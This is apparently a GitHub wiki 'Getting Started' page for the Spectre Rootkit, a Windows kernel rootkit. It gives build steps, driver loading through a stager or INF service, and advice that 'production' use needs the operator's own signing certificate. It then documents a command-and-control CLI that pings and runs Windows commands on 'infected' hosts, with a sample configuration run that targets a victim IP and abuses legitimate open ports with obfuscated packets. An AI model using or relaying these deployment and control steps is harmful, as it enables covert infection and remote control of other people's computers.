-
Notifications
You must be signed in to change notification settings - Fork 141
Getting Started
In order to build all of the components of the Spectre Rootkit, you're going to need to install a few things.
- Install Visual Studio 2019 with the "Desktop development with C++" workload. Microsoft has great documentation for installing Visual Studio with C/C++ support here.
- Install the Windows Driver Kit for Visual Studio 2019.
You can build the projects inside of the solution in any order.
The Spectre Rootkit driver is by default built in test-signing mode. For use in production, you will need to bring-your-own-certificate or loading mechanism. "Demystifying Modern Windows Rootkits", presented at both Black Hat USA 2020 and DEF CON 28, explores several methods of signing a rootkit.
You can load the rootkit driver by using the spectre-stager or install the driver by installing the spectre-kernel.inf file and starting the Spectre Rootkit service.
If you built the spectre-kernel project in Debug mode, verbose logging is available by kernel debugging the victim machine. You can learn more about how to set up kernel-mode debugging here.
With everything built, to deploy the Spectre Rootkit to a target machine, simply run the spectre-stager project on the victim machine.
Once you have infected a victim machine, you can use the spectre-cli to control the rootkit.
The Spectre CLI is used for communicating with a host infected with the Spectre Rootkit.
Usage:
spectre-cli.exe [module name] [module options]
Modules:
help
Displays this help menu.
configure [output config file]
Launches the configuration wizard to generate a config file, used in other modules.
ping [config file name]
Uses a config file to determine if a host is infected with the Spectre Rootkit.
command [config file name]
Uses a config file to execute a Windows command on an infected host.
The first step with the CLI is to generate a config file by running the configure module. You can learn more about each configuration value below:
| Name | Description |
|---|---|
| timeout to connect to a port (in ms) | This is the timeout value used when connecting to a victim machine. Keep in mind that the timeout is applied for every connection to each individual port on a machine. |
| number of "obfuscation layers" to apply to outgoing packets | The Spectre Rootkit design allows for "encapsulating packets". This config value specifies how many layers of "encapsulating packets" you want to apply to outgoing packets. The type of encapsulating packet applied to each layer is random. |
| number of times to retry failed responses | This is the number of times the CLI should attempt to receive a response from the victim machine. |
| target IP address | The IPv4 address of the victim machine. |
| ports to target separated by a comma | The Spectre Rootkit design abuses legitimate communication channels to communicate with the rootkit. This is a list of legitimate ports open on the victim machine to attempt to connect to. |
Here is a sample run of the Configuration Wizard:
>spectre-cli.exe configure testconfig
Welcome to the Spectre Rootkit.
This configuration wizard is designed to assist you with the generation of a configuration file.
You need a configuration file to use any other module in the Spectre CLI.
Please enter a value for "timeout to connect to a port (in ms)" (default: 1000):
500
Please enter a value for "number of "obfuscation layers" to apply to outgoing packets" (default: 2):
1
Please enter a value for "number of times to retry failed responses" (default: 3):
2
Please enter a value for "target IP address" (default: ):
192.168.1.123
Please enter a value for "ports to target separated by a comma" (default: 135,5040,7680):
135,5040
Saved options to configuration "testconfig".
With a config generated, you can use any of the other modules, passing the config file name as the first argument. Before being able to use the command module, you will need to use the ping module at least once. The ping module is responsible for scanning the ports you specified in the Configuration Wizard and determine which ones are under the control of the Spectre Rootkit.